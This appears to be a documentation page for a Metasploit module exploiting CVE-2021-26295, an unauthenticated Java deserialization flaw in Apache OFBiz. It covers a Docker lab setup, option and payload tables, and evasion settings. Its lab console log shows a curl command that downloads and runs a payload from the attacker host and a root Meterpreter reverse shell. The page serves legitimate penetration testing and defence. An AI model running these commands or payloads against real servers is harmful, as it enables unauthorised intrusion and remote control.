Apache OFBiz SOAP Java Deserialization - Metasploit


This page contains detailed information about how to use the exploit/linux/http/apache_ofbiz_deserialization_soap metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apache OFBiz SOAP Java Deserialization
Module: exploit/linux/http/apache_ofbiz_deserialization_soap
Source code: modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb
Disclosure date: 2021-03-22
Last modification time: 2021-04-05 09:33:20 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-26295

This module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for versions prior to 17.12.06.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/apache_ofbiz_deserialization_soap
msf exploit(apache_ofbiz_deserialization_soap) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Description

This module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for versions prior to 17.12.06.

Setup

You can use https://hub.docker.com/r/opensourceknight/ofbiz.

  1. Initialize the database with demo data (INIT_DB=2) and bind to ports 8080 and 8443
    • docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12

Verification Steps


Follow Setup and Scenarios.

Targets


0

This executes a Unix command.

1

This uses a Linux dropper to execute code.

Scenarios


Apache OFBiz from Docker.

msf6 > use exploit/linux/http/apache_ofbiz_deserialization_soap 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > options

Module options (exploit/linux/http/apache_ofbiz_deserialization_soap):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.128  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8081             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8081/qL5QfV
[*] Local IP: http://192.168.250.87:8081/qL5QfV
[*] Client 172.17.0.2 (curl/7.38.0) requested /qL5QfV
[*] Sending payload to 172.17.0.2 (curl/7.38.0)
[+] Successfully executed command: curl -so /tmp/wHwoartY http://192.168.159.128:8081/qL5QfV;chmod +x /tmp/wHwoartY;/tmp/wHwoartY;rm -f /tmp/wHwoartY
[*] Sending stage (3012516 bytes) to 172.17.0.2
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Meterpreter session 9 opened (192.168.159.128:4444 -> 172.17.0.2:47186) at 2021-03-30 17:13:01 -0400
[*] Server stopped.

meterpreter > getuid
Server username: root @ bac44466b17e (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 8.4 (Linux 5.10.22-100.fc32.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the linux/http/apache_ofbiz_deserialization_soap exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/apache_ofbiz_deserialization_soap

[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > show info

       Name: Apache OFBiz SOAP Java Deserialization
     Module: exploit/linux/http/apache_ofbiz_deserialization_soap
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-03-22

Provided by:
  yumusb
  Spencer McIntyre
  wvu <[email protected]>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8443             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a Java deserialization vulnerability in Apache 
  OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService 
  for versions prior to 17.12.06.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-26295
  https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py
  https://issues.apache.org/jira/browse/OFBIZ-12167

Module Options


This is a complete list of options available in the linux/http/apache_ofbiz_deserialization_soap exploit:

msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialization_soap):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Advanced Options


Here is a complete list of advanced options supported by the linux/http/apache_ofbiz_deserialization_soap exploit:

msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > show advanced

Module advanced options (exploit/linux/http/apache_ofbiz_deserialization_soap):

   Name                                    Current Setting                                     Required  Description
   ----                                    ---------------                                     --------  -----------
   AutoCheck                               true                                                no        Run check before exploit
   CMDSTAGER::DECODER                                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR                       curl                                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, l
                                                                                                         wprequest, psh_invokewebrequest)
   CMDSTAGER::SSL                          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                                             no        Writable directory for staged files
   ContextInformationFile                                                                      no        The information file that contains context information
   DOMAIN                                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS                           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler                   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR                              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack                           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject                             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod                          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                                               no        The executable template file name.
   EnableContextEncoding                   false                                               no        Use transient context when encoding payloads
   FingerprintCheck                        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit                            false                                               no        Override check result
   HttpClientTimeout                                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors                         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly                    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR                              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                                               no        The msi template file name
   MSI::UAC                                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   Powershell::encode_final_payload        false                                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                               yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                          yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                yes       Execute powershell without interaction
   Powershell::persist                     false                                               yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true                                                yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                                                   no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                               yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                yes       Strip comments
   Powershell::strip_whitespace            false                                               yes       Strip whitespace
   Powershell::sub_funcs                   false                                               yes       Substitute function names
   Powershell::sub_vars                    true                                                yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                yes       Wraps the -Command argument in single quotes
   SSLCipher                                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression                          false                                               no        Enable SSL/TLS-level compression
   SSLVersion                              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2
                                                                                                         )
   SendRobots                              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent                               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module
   WfsDelay                                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter_reverse_https):

   Name                         Current Setting                                                Required  Description
   ----                         ---------------                                                --------  -----------
   AutoLoadStdapi               true                                                           yes       Automatically load the Stdapi extension
   AutoRunScript                                                                               no        A script to run automatically on session creation.
   AutoSystemInfo               true                                                           yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false                                                          yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30                                                             no        Timeout period to wait for session validation to occur, in seconds
   EnableUnicodeEncoding        false                                                          yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                                                              no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpServerName               Apache                                                         no        The server header that the handler will send in response to requests
   HttpUnknownRequestResponse   <html><body><h1>It works!</h1></body></html>                   no        The returned HTML response body when the handler receives a request that is not from a payload
   HttpUserAgent                Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  no        The user-agent that the payload should use for communication Max parameter length: 255 characters
   IgnoreUnknownPayloads        false                                                          no        Whether to drop connections from payloads using unknown UUIDs
   InitialAutoRunScript                                                                        no        An initial script to run on session creation (before AutoRunScript)
   OverrideLHOST                                                                               no        When OverrideRequestHost is set, use this value as the host name for secondary requests
   OverrideLPORT                                                                               no        When OverrideRequestHost is set, use this value as the port number for secondary requests
   OverrideRequestHost          false                                                          no        Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
   OverrideScheme                                                                              no        When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
   PayloadProcessCommandLine                                                                   no        The displayed command line that will be used by the payload
   PayloadUUIDName                                                                             no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                                                              no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                                                                             no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false                                                          yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                                                              yes       How many additional successful pingbacks
   PingbackSleep                30                                                             yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false                                                          yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                                                                  no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                                                                     no        The port to bind to on the local system if different from LPORT
   SessionCommunicationTimeout  300                                                            no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800                                                         no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600                                                           no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10                                                             no        Number of seconds to wait between reconnect attempts
   StagerVerifySSLCert          false                                                          no        Whether to verify the SSL certificate in Meterpreter
   VERBOSE                      false                                                          no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/apache_ofbiz_deserialization_soap module can exploit:

msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/apache_ofbiz_deserialization_soap exploit:

msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   12  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   13  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   14  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   15  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   16  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   17  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   18  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   19  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   20  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   21  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   24  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   25  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   26  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   27  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   28  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   32  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   33  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   34  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   35  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   36  payload/linux/x86/read_file                                        normal  No     Linux Read File
   37  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   38  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   39  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   40  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   41  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   42  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   43  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   47  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   48  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   49  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   50  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/apache_ofbiz_deserialization_soap exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/apache_ofbiz_deserialization_soap) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target did not respond to check.


Here is a relevant code snippet related to the "Target did not respond to check." error message:

88:	  def check
89:	    # Send an empty serialized object
90:	    res = send_request_soap('')
91:	
92:	    unless res
93:	      return CheckCode::Unknown('Target did not respond to check.')
94:	    end
95:	
96:	    messages = {}
97:	    res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
98:	      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s

Problem deserializing object from byte array


Here is a relevant code snippet related to the "Problem deserializing object from byte array" error message:

97:	    res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
98:	      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
99:	      messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
100:	    end
101:	
102:	    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
103:	      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
104:	    end
105:	
106:	    CheckCode::Safe('Target cannot deserialize arbitrary data.')
107:	  end

Target can deserialize arbitrary data.


Here is a relevant code snippet related to the "Target can deserialize arbitrary data." error message:

98:	      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
99:	      messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
100:	    end
101:	
102:	    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
103:	      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
104:	    end
105:	
106:	    CheckCode::Safe('Target cannot deserialize arbitrary data.')
107:	  end
108:	

Target cannot deserialize arbitrary data.


Here is a relevant code snippet related to the "Target cannot deserialize arbitrary data." error message:

101:	
102:	    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
103:	      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
104:	    end
105:	
106:	    CheckCode::Safe('Target cannot deserialize arbitrary data.')
107:	  end
108:	
109:	  def exploit
110:	    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
111:	

Failed to execute command: <CMD>


Here is a relevant code snippet related to the "Failed to execute command: <CMD>" error message:

124:	      # framework/webapp/lib/rome-0.9.jar
125:	      generate_java_deserialization_for_command('ROME', 'bash', cmd)
126:	    )
127:	
128:	    unless res && res.code == 200
129:	      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
130:	    end
131:	
132:	    print_good("Successfully executed command: #{cmd}")
133:	  end
134:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • yumusb
  • Spencer McIntyre
  • wvu

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.